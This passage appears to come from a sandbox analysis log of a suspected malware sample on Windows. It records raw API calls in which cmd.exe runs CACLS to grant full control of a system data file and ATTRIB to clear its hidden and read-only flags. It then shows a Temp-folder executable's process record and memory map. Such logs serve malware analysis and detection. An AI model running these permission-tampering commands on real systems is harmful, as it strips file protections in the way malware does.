(_String1="KEYS", _String2="RANDOM") returned -7 [0117.056] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0117.056] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24fb28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.056] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24fb28, lpFilePart=0x24fb24 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24fb24*="Desktop") returned 0x18 [0117.056] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0117.056] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f8a4 | out: lpFindFileData=0x24f8a4) returned 0x370a50 [0117.056] FindClose (in: hFindFile=0x370a50 | out: hFindFile=0x370a50) returned 1 [0117.057] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f8a4 | out: lpFindFileData=0x24f8a4) returned 0x370a50 [0117.057] FindClose (in: hFindFile=0x370a50 | out: hFindFile=0x370a50) returned 1 [0117.057] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f8a4 | out: lpFindFileData=0x24f8a4) returned 0x370a50 [0117.057] FindClose (in: hFindFile=0x370a50 | out: hFindFile=0x370a50) returned 1 [0117.057] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0117.057] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0117.057] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0117.057] GetEnvironmentStringsW () returned 0x370270* [0117.057] FreeEnvironmentStringsW (penv=0x370270) returned 1 [0117.057] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.058] GetConsoleOutputCP () returned 0x1b5 [0117.058] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0117.058] GetUserDefaultLCID () returned 0x409 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fc68, cchData=128 | out: lpLCData="0") returned 2 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fc68, cchData=128 | out: lpLCData="0") returned 2 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fc68, cchData=128 | out: lpLCData="1") returned 2 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0117.059] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0117.060] GetConsoleTitleW (in: lpConsoleTitle=0x360970, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.060] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0117.060] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0117.060] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0117.060] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0117.061] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0117.061] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0117.061] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0117.061] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0117.061] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0117.061] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0117.061] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0117.061] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0117.064] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0117.064] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0117.064] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0117.064] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0117.064] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0117.064] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0117.064] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0117.066] GetConsoleTitleW (in: lpConsoleTitle=0x24f8fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.066] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0117.066] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0117.066] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0117.066] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0117.066] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0117.066] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0117.066] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0117.066] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0117.066] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0117.066] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0117.066] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0117.066] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0117.066] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0117.066] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0117.066] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0117.066] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0117.066] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0117.066] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0117.066] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0117.066] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0117.066] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0117.066] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0117.066] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0117.066] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0117.066] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0117.066] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0117.066] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0117.066] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0117.066] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0117.066] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0117.066] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0117.066] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0117.067] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0117.067] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0117.067] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0117.067] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0117.067] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0117.067] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0117.067] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0117.067] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0117.067] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0117.067] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0117.067] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0117.067] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0117.067] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0117.067] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0117.067] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0117.067] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0117.067] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0117.067] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0117.067] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0117.067] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0117.067] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0117.067] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0117.067] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0117.067] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0117.067] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0117.067] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0117.067] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0117.067] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0117.067] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0117.067] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0117.067] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0117.067] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0117.067] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0117.067] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0117.067] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0117.067] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0117.067] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0117.067] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0117.067] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0117.067] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0117.067] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0117.067] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0117.067] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0117.067] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0117.067] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0117.067] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0117.067] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0117.067] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0117.068] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0117.068] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0117.068] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0117.068] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0117.068] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0117.068] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0117.068] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0117.068] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0117.068] SetErrorMode (uMode=0x0) returned 0x0 [0117.068] SetErrorMode (uMode=0x1) returned 0x0 [0117.068] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x371e00, lpFilePart=0x24f41c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f41c*="Desktop") returned 0x18 [0117.068] SetErrorMode (uMode=0x0) returned 0x1 [0117.068] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0117.068] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0117.143] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.143] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x24f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f198) returned 0xffffffff [0117.143] GetLastError () returned 0x2 [0117.143] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x24f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f198) returned 0xffffffff [0117.144] GetLastError () returned 0x2 [0117.144] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x24f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f198) returned 0x360f30 [0117.144] FindClose (in: hFindFile=0x360f30 | out: hFindFile=0x360f30) returned 1 [0117.144] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x24f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f198) returned 0xffffffff [0117.144] GetLastError () returned 0x2 [0117.144] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x24f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f198) returned 0x360f30 [0117.144] FindClose (in: hFindFile=0x360f30 | out: hFindFile=0x360f30) returned 1 [0117.144] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0117.144] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0117.144] GetConsoleTitleW (in: lpConsoleTitle=0x24f690, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.144] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f518, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f5e0 | out: lpAttributeList=0x24f518, lpSize=0x24f5e0) returned 1 [0117.144] UpdateProcThreadAttribute (in: lpAttributeList=0x24f518, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f5d8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f518, lpPreviousValue=0x0) returned 1 [0117.144] GetStartupInfoW (in: lpStartupInfo=0x24f4d4 | out: lpStartupInfo=0x24f4d4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0117.145] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0117.146] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f574*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f5c0 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x24f5c0*(hProcess=0x50, hThread=0x4c, dwProcessId=0xec0, dwThreadId=0xec4)) returned 1 [0117.497] CloseHandle (hObject=0x4c) returned 1 [0117.497] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0117.497] GetEnvironmentStringsW () returned 0x370270* [0117.497] FreeEnvironmentStringsW (penv=0x370270) returned 1 [0117.497] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0118.174] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x24f4b4 | out: lpExitCode=0x24f4b4*=0x0) returned 1 [0118.174] CloseHandle (hObject=0x50) returned 1 [0118.174] _vsnwprintf (in: _Buffer=0x24f5fc, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f4c0 | out: _Buffer="00000000") returned 8 [0118.174] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0118.174] GetEnvironmentStringsW () returned 0x372328* [0118.175] FreeEnvironmentStringsW (penv=0x372328) returned 1 [0118.175] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0118.175] GetEnvironmentStringsW () returned 0x372328* [0118.175] FreeEnvironmentStringsW (penv=0x372328) returned 1 [0118.175] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f518 | out: lpAttributeList=0x24f518) [0118.175] GetConsoleTitleW (in: lpConsoleTitle=0x24f8fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0118.175] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0118.175] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0118.175] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0118.175] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x24f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f198) returned 0xffffffff [0118.176] GetLastError () returned 0x2 [0118.176] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x24f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f198) returned 0xffffffff [0118.176] GetLastError () returned 0x2 [0118.176] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x24f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f198) returned 0x360f30 [0118.176] FindClose (in: hFindFile=0x360f30 | out: hFindFile=0x360f30) returned 1 [0118.176] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x24f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f198) returned 0xffffffff [0118.176] GetLastError () returned 0x2 [0118.176] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x24f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f198) returned 0x360f30 [0118.177] FindClose (in: hFindFile=0x360f30 | out: hFindFile=0x360f30) returned 1 [0118.177] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0118.177] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0118.177] GetConsoleTitleW (in: lpConsoleTitle=0x24f690, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0118.177] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f518, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f5e0 | out: lpAttributeList=0x24f518, lpSize=0x24f5e0) returned 1 [0118.177] UpdateProcThreadAttribute (in: lpAttributeList=0x24f518, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f5d8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f518, lpPreviousValue=0x0) returned 1 [0118.177] GetStartupInfoW (in: lpStartupInfo=0x24f4d4 | out: lpStartupInfo=0x24f4d4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0118.177] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0118.177] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f574*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f5c0 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\"", lpProcessInformation=0x24f5c0*(hProcess=0x4c, hThread=0x50, dwProcessId=0xf1c, dwThreadId=0xf20)) returned 1 [0118.665] CloseHandle (hObject=0x50) returned 1 [0118.665] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0118.665] GetEnvironmentStringsW () returned 0x372328* [0118.665] FreeEnvironmentStringsW (penv=0x372328) returned 1 [0118.665] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0119.240] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x24f4b4 | out: lpExitCode=0x24f4b4*=0x0) returned 1 [0119.240] CloseHandle (hObject=0x4c) returned 1 [0119.240] _vsnwprintf (in: _Buffer=0x24f5fc, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f4c0 | out: _Buffer="00000000") returned 8 [0119.240] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0119.240] GetEnvironmentStringsW () returned 0x372328* [0119.241] FreeEnvironmentStringsW (penv=0x372328) returned 1 [0119.242] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0119.243] GetEnvironmentStringsW () returned 0x372328* [0119.243] FreeEnvironmentStringsW (penv=0x372328) returned 1 [0119.243] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f518 | out: lpAttributeList=0x24f518) [0119.243] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.243] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0119.243] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.243] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0119.243] _get_osfhandle (_FileHandle=0) returned 0x3 [0119.243] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0119.244] SetConsoleInputExeNameW () returned 0x1 [0119.244] GetConsoleOutputCP () returned 0x1b5 [0119.244] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0119.244] SetThreadUILanguage (LangId=0x0) returned 0x409 [0119.244] exit (_Code=0) Process: id = "52" image_name = "w588h5dn.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe" page_root = "0x7ea16640" os_pid = "0xe10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "45" os_parent_pid = "0xd94" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7990 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7991 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 7992 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 7993 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "w588h5dn.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe") Region: id = 7994 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7995 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7996 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7997 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 7998 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 7999 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8000 start_va = 0x150000 end_va = 